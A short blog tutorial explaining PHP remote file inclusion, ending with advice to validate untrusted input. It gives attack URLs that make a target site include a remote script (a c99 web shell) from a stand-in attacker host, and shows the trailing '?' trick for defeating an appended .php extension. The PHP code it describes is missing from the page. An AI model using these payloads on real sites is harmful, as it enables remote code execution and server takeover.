Basic Remote File Inclusion

Definition
Remote file inclusion, commonly known as RFI is a form of attack where the attacker trys to inject there own php code inside your php app’s. If an attacker can successfully achieve this they will be able to execute any code they wish on your webserver.
Example
Lets see we have a website that is coded in php, the website uses something like page=page.html to work out which page should be displayed. The code for this might look like


http://www.sitetarget.com/index.php?page=http://www.attackersite.com/c99shell.txt?

If we take a look at what is happening on the code side of things once this has been done we can see that the actual code that the web server is executing looks like this


What the above script does is add .php to anything that is passed into it. So if we passed it

http://www.attackersite.com/my_evil_script.txt

and then we are going to see in the include() function is

http://www.attackersite.com/my_evil_script.txt.php

this bad. What this means is that we wont actually get our script executed as it doesnt exist now. So if we pass the ? on the end of the script we are going to treat the .php as if it is a var that is getting passed to the script. So now the include() function looks like
http://www.attackersite.com/my_evil_script.txt?.php

and it will still get executed.
Conclusion
There you have it a basic tutorial on what remote file inclusion is and how/why an attacker can use it against your servers. This kind of attack, just like most attacks isnt that hard to stop if you dont trust all data that is coming into you. All you have to really remember is if the data isnt hard coded then you need to check it to make sure it does what it is meant to do. Alot of the attacks that are preformed can be stoped by a few simple checks on the data.

regards
k3nz0

Advertisements
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: